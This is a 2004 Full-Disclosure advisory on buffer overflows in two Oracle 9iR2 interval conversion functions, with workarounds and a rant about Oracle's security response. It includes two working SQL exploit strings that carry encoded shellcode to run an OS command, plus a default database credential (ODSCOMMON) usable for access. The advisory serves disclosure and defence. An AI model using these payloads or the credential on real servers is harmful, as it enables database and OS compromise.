Security Advisory Name: Oracle Database 9ir2 Interval Conversion Functions Buffer Overflow. System Affected : Oracle Database 9ir2, previous versions could be affected too. Severity : High Remote exploitable : Yes Author: Cesar Cerrudo. Date: 02/05/04 Advisory Number: CC020401
Legal Notice: This Advisory is Copyright (c) 2003 Cesar Cerrudo. You may distribute it unmodified and for free. You may NOT modify it and distribute it or distribute parts of it without the author's written permission. You may NOT use it for commercial intentions (this means include it in vulnerabilities databases, vulnerabilities scanners, any paid service, etc.) without the author's written permission. You are free to use Oracle details for commercial intentions. Disclaimer: The information in this advisory is believed to be true though it may be false. The opinions expressed in this advisory are my own and not of any company. The usual standard disclaimer applies, especially the fact that Cesar Cerrudo is not liable for any damages caused by direct or indirect use of the information or functionality provided by this advisory. Cesar Cerrudo bears no responsibility for content or misuse of this advisory or any derivatives thereof. !!!!!!!!!!!ALERT!!!!!!!!!!!: Oracle was contacted about these vulnerabilities, but their Security Response Team is one of the worst that i have deal with, they don't care about security and they don't even follow OISafety rules(Oracle is a member). Because this reason we only have told to Oracle about just a couple of bugs, i think i won't contact them anymore, or maybe if i get a letter from Larry Ellison asking for apologies...:). Anyways if Oracle would spend more money on security than in marketing saying that their products are unbreakable everything would be different. Right now Oracle database server and other Oracle products are some kind of backdoor. These vulnerabilities are just only a bit of +60 that we have identified (yes more than 60 issues and most of these issues can be exploited by any low privileged user to take complete control over the database and probably OS, also for some of them there aren't any workarounds). If you are running Oracle i recomend you to start praying to not being hacked and to start complaining to Oracle to improve the quality of their products and to release patches. BTW: if someone from Oracle dares to say that i'm not telling the true, then probably i will release all the holes information to shut their mouths. Some workaround to protect your Oracle servers until maybe next year when Oracle probably could fix their buggy database server: -Check packages permissions and remove public permission, set minimal permissions that fit your needs. -Check Directory Objects permissions and remove public permission, set minimal permissions that fit your need, remove Directory Objecs if not used. -Restrict users to execute directly PL/SQL statements over the server. -Periodically audit users permissions on all database objects. -Lock users that aren't used. -Change default passwords. If you want automation, i really like AppDetective for Oracle: http://www.appsecinc.com/products/appdetective/oracle/ Overview: Oracle Database Server is one of the most used database servers in the world, it was marketed as being unbreakable and many people thinks that is one of the most secure database server in the market. Larry Ellison (Oracle CEO) says that Oracle is used by NSA, CIA, russian intelligence, goverments, etc. (www.commonwealthclub.org/archive/96/96-03ellison-qa.html), so it must be really secure!!! Oracle Database Server provides two functions that can be used with PL/SQL to convert numbers to date/time intervals, these functions have buffer overflow vulnerebilities. Details: When any of these conversion funcions are called with a long string as a second parameter a buffer overflow occurs. To reproduce the overflow execute the next PL/SQL: SELECT NUMTOYMINTERVAL(1,'longstringhere') from dual; SELECT NUMTODSINTERVAL(1,'longstringhere') from dual; This vulnerability can be exploited by any Oracle Database user because access to these functions can't be restricted. Explotation of this vulnerability allow an attacker to execute arbitrary code, also it can be exploited to cause DOS (Denial of service) killing Oracle server process. An attacker can complete compromise the OS and database if Oracle is running on Windows plataform, because Oracle must run under the local System account or under an administrative account. If Oracle is running on *nix then only the database could be compromised because Oracle runs mostly under oracle user which has restricted permissions. Important!: Explotation of these vulnerabilities becomes easy if Oracle Internet Directory has been deployed, because Oracle Internet Directory creates a database user called ODSCOMMON that has a default password ODSCOMMON (Unbreakable???, hahaha, please take a look at this http://igloo.its.unimelb.edu.au/Webmail/tips/msg00762.html), this password can not be changed, so any attacker can use this user to connect to database and exploit these vunerabilities. Full tests on Oracle database 9ir2 under Microsoft Windows 2000 Server and Linux confirm these vulnerabilities, versions running in other OS plataforms are believed to be affected too. Previous Oracle Database Server versions could be affected by these vulnerabilities. Exploits: --these exploits should work on W2K Server and WinXp, not tested on Win2003. --run any command at the end of the string SELECT NUMTOYMINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR' || chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||chr(52)||chr(35)||chr(1 48)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)||'echo ARE YOU SURE? >c:\Unbreakable.txt') FROM DUAL; SELECT NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR' || chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||chr(52)||chr(35)||chr(1 48)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)||'echo ARE YOU SURE? >c:\Unbreakable.txt') FROM DUAL; Vendor Fix: Go to Oracle Metalink site, http://metalink.oracle.com Vendor Contact: Oracle was contacted and they released a fix without telling me nor the public anything and without issuing an alert. __________________________________ Do you Yahoo!? Yahoo! Finance: Get your refund fast by filing online. http://taxes.yahoo.com/filing.html _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html